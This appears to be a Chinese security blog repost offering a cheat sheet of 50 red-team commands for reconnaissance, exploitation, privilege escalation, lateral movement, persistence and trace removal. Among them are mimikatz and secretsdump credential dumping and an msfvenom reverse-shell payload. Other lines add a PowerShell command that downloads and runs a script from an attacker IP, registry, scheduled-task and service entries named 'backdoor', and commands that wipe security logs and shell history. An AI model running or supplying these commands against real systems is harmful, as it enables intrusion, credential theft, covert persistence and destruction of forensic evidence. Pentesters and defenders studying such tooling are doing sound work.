红队利器 | 50个高频渗透攻防命令速查

admin 2025年2月8日01:13:45评论13 views字数 2812阅读9分22秒阅读模式

在渗透测试与红队攻防中,熟练使用命令行工具是安全从业者的核心能力。本文整理了50个高频渗透攻防命令,覆盖信息收集、漏洞利用、权限提升、内网横向等核心场景,助你快速定位问题、提升实战效率。

一、信息收集与侦查

  1. 1. nmap -sV -p 1-65535 <target>

    • • 全端口扫描+服务版本探测。

  2. 2. masscan -p1-65535 <target> --rate=1000

    • • 高速端口扫描(需Root权限)。

  3. 3. dig <domain> ANY

    • • 查询域名的DNS记录(含TXT/MX等)。

  4. 4. whois <domain>

    • • 获取域名的注册信息。

  5. 5. theHarvester -d <domain> -b google

    • • 搜索引擎关联信息搜集。

  6. 6. subfinder -d <domain>

    • • 自动化子域名枚举。

  7. 7. curl -I <url>

    • • 获取HTTP响应头(检查Server类型)。

  8. 8. wafw00f <url>

    • • 检测目标是否部署WAF。

  9. 9. smtp-user-enum -M VRFY -U users.txt -t <target>

    • • SMTP服务用户枚举。

  10. 10. enum4linux -a <target>

    • • Samba/LDAP服务信息枚举。

二、漏洞探测与利用

  1. 11. sqlmap -u "http://target.com/?id=1" --dbs

    • • 自动化SQL注入检测与数据库枚举。

  2. 12. nikto -h <target>

    • • Web服务器漏洞扫描(常见配置缺陷)。

  3. 13. gobuster dir -u <url> -w wordlist.txt

    • • 目录/文件暴力枚举。

  4. 14. searchsploit <keyword>

    • • 本地Exploit-DB漏洞库搜索。

  5. 15. msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor"

    • • Metasploit模块快速调用。

  6. 16. hydra -L users.txt -P passwords.txt ftp://<target>

    • • FTP暴力破解(支持多协议)。

  7. 17. responder -I eth0

    • • LLMNR/NBT-NS毒化攻击(窃取哈希)。

  8. 18. impacket-psexec <user>:<password>@<target>

    • • 通过SMB执行远程命令(Pass-the-Hash)。

  9. 19. smbmap -H <target>

    • • SMB共享目录权限探测。

  10. 20. crackmapexec smb <target> -u users.txt -p passwords.txt

    • • 内网SMB服务批量爆破。

三、权限提升与后渗透

  1. 21. sudo -l

    • • 查看当前用户可用的sudo权限。

  2. 22. find / -perm -4000 2>/dev/null

    • • 查找SUID权限文件(提权利用点)。

  3. 23. linpeas.sh

    • • Linux本地提权自动化检测脚本。

  4. 24. windows-exploit-suggester.py --update

    • • Windows补丁漏洞检测(比对systeminfo)。

  5. 25. mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"

    • • 内存中提取明文密码(Windows)。

  6. 26. procdump -ma <PID>

    • • 导出进程内存(配合Mimikatz分析)。

  7. 27. net user /domain

    • • 查询域用户列表(Windows域环境)。

  8. 28. secretsdump.py -hashes <hash> <domain>/<user>@<target>

    • • 导出域控哈希(Impacket工具链)。

  9. 29. bloodhound-python -d <domain> -u <user> -p <password> -c All

    • • BloodHound数据采集(域环境分析)。

  10. 30. chisel client <attacker_ip>:<port> R:socks

    • • 建立Socks5隧道穿透内网。

四、内网横向与持久化

  1. 31. arp-scan -l

    • • 内网主机存活探测(ARP扫描)。

  2. 32. ssh -D 1080 user@<target>

    • • 通过SSH建立动态端口转发。

  3. 33. ping -n 1 <target>

    • • Windows主机存活检测(ICMP)。

  4. 34. psexec.py <domain>/<user>:<password>@<target>

    • • 横向移动执行命令(Impacket)。

  5. 35. evil-winrm -i <target> -u <user> -p <password>

    • • 通过WinRM远程连接Windows。

  6. 36. sc.exe \<target> create backdoor binpath= "cmd.exe /k C:shell.exe"

    • • 创建远程服务(Windows横向)。

  7. 37. reg add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v backdoor /t REG_SZ /d "C:shell.exe"

    • • 注册表添加持久化启动项。

  8. 38. schtasks /create /tn "backdoor" /tr "C:shell.exe" /sc hourly

    • • 计划任务持久化(Windows)。

  9. 39. msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe

    • • 生成木马载荷(Metasploit)。

  10. 40. powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1')"

    • • 内存加载PowerShell脚本(免杀)。

五、痕迹清理与应急响应

  1. 41. shred -zuv <file>

    • • 安全擦除文件(覆盖后删除)。

  2. 42. history -c

    • • 清除当前Shell历史记录(Linux)。

  3. 43. wevtutil cl security

    • • 清理Windows安全事件日志。

  4. 44. rm -rf ~/.bash_history

    • • 删除Bash历史文件(Linux)。

  5. 45. taskkill /F /PID <pid>

    • • 强制终止进程(Windows)。

  6. 46. logreset.py -t <target> -u <user> -p <password>

    • • 远程日志清除(需权限)。

  7. 47. clearev

    • • Metasploit会话中一键清除日志。

  8. 48. find / -name "*.log" -exec rm {} ;

    • • 删除所有日志文件(谨慎使用)。

  9. 49. iptables -F

    • • 清空防火墙规则(Linux)。

  10. 50. netsh advfirewall reset

    • • 重置Windows防火墙配置。

原文始发于微信公众号(HACK之道):红队利器 | 50个高频渗透攻防命令速查

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月8日01:13:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队利器 | 50个高频渗透攻防命令速查https://cn-sec.com/archives/3704006.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息